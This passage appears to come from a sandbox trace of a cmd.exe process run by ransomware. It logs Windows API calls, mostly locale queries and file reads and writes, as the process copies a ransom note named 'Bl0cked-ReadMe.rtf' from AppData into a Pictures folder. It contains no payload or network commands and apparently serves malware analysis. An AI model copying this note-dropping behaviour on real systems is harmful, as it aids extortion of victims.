(in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f4e0, lpFilePart=0x20f4dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f4dc*="Desktop") returned 0x18 [0144.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.865] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f25c | out: lpFindFileData=0x20f25c) returned 0x3f0018 [0144.865] FindClose (in: hFindFile=0x3f0018 | out: hFindFile=0x3f0018) returned 1 [0144.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f25c | out: lpFindFileData=0x20f25c) returned 0x3f0018 [0144.865] FindClose (in: hFindFile=0x3f0018 | out: hFindFile=0x3f0018) returned 1 [0144.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f25c | out: lpFindFileData=0x20f25c) returned 0x3f0018 [0144.865] FindClose (in: hFindFile=0x3f0018 | out: hFindFile=0x3f0018) returned 1 
[0144.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.866] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0144.866] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0144.866] GetEnvironmentStringsW () returned 0x3f2af8* [0144.866] FreeEnvironmentStringsW (penv=0x3f2af8) returned 1 [0144.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.866] GetConsoleOutputCP () returned 0x1b5 [0144.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.867] GetUserDefaultLCID () returned 0x409 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f620, cchData=128 | out: lpLCData="0") returned 2 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f620, cchData=128 | out: lpLCData="0") returned 2 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f620, cchData=128 | out: lpLCData="1") returned 2 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, 
cchData=32 | out: lpLCData="Fri") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0144.868] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0144.869] GetConsoleTitleW (in: lpConsoleTitle=0x3e08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.869] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0144.869] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0144.869] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0144.870] _wcsicmp (_String1="type", _String2=")") returned 75 [0144.870] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0144.870] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0144.870] _wcsicmp (_String1="IF", _String2="type") returned -11 [0144.870] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0144.870] _wcsicmp (_String1="REM", _String2="type") returned -2 [0144.870] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0144.874] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.875] GetFileType (hFile=0x7) returned 0x2 [0144.974] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0144.974] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20f518 | out: lpMode=0x20f518) returned 1 [0144.975] _dup 
(_FileHandle=1) returned 3 [0144.975] _close (_FileHandle=1) returned 0 [0144.975] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0144.975] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x20f4e8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0144.977] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0144.977] GetConsoleTitleW (in: lpConsoleTitle=0x20f318, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.977] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0144.977] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0144.977] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0144.977] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0144.978] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.978] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x20ee7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee7c) returned 0x3e0e78 [0144.979] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0144.979] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0144.979] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0144.979] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x20dd88, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0144.979] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0144.979] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.979] GetFileType (hFile=0x54) returned 0x1 [0144.979] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.979] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x20dde0 | out: lpFileSizeHigh=0x20dde0*=0x0) returned 0x1632 [0144.979] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.979] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.979] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.979] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.979] GetFileType (hFile=0x4c) returned 0x1 [0144.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.979] GetFileType (hFile=0x4c) returned 0x1 [0144.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.980] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] GetFileType (hFile=0x4c) returned 0x1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] GetFileType (hFile=0x4c) returned 0x1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] WriteFile (in: hFile=0x4c, 
lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] GetFileType (hFile=0x4c) returned 0x1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] GetFileType (hFile=0x4c) returned 0x1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] GetFileType (hFile=0x4c) returned 0x1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] GetFileType (hFile=0x4c) returned 0x1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.982] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.982] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.982] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0144.982] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] GetFileType (hFile=0x4c) returned 0x1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] GetFileType (hFile=0x4c) returned 0x1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] GetFileType (hFile=0x4c) returned 0x1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] GetFileType (hFile=0x4c) returned 0x1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] GetFileType (hFile=0x4c) returned 0x1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] 
GetFileType (hFile=0x4c) returned 0x1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] GetFileType (hFile=0x4c) returned 0x1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] GetFileType (hFile=0x4c) returned 0x1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.983] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.983] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] GetFileType (hFile=0x4c) returned 0x1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] GetFileType (hFile=0x4c) returned 0x1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | 
out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] GetFileType (hFile=0x4c) returned 0x1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] GetFileType (hFile=0x4c) returned 0x1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] GetFileType (hFile=0x4c) returned 0x1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] GetFileType (hFile=0x4c) returned 0x1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] GetFileType (hFile=0x4c) returned 0x1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, 
lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] GetFileType (hFile=0x4c) returned 0x1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.985] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.985] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] GetFileType (hFile=0x4c) returned 0x1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] GetFileType (hFile=0x4c) returned 0x1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] GetFileType (hFile=0x4c) returned 0x1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] GetFileType (hFile=0x4c) returned 0x1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0144.985] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] GetFileType (hFile=0x4c) returned 0x1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] GetFileType (hFile=0x4c) returned 0x1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] GetFileType (hFile=0x4c) returned 0x1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] GetFileType (hFile=0x4c) returned 0x1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.986] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) 
returned 1 [0144.986] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.986] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] GetFileType (hFile=0x4c) returned 0x1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] GetFileType (hFile=0x4c) returned 0x1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] GetFileType (hFile=0x4c) returned 0x1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] GetFileType (hFile=0x4c) returned 0x1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] GetFileType (hFile=0x4c) returned 0x1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.987] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0144.987] GetFileType (hFile=0x4c) returned 0x1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] GetFileType (hFile=0x4c) returned 0x1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] GetFileType (hFile=0x4c) returned 0x1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.987] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.987] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] GetFileType 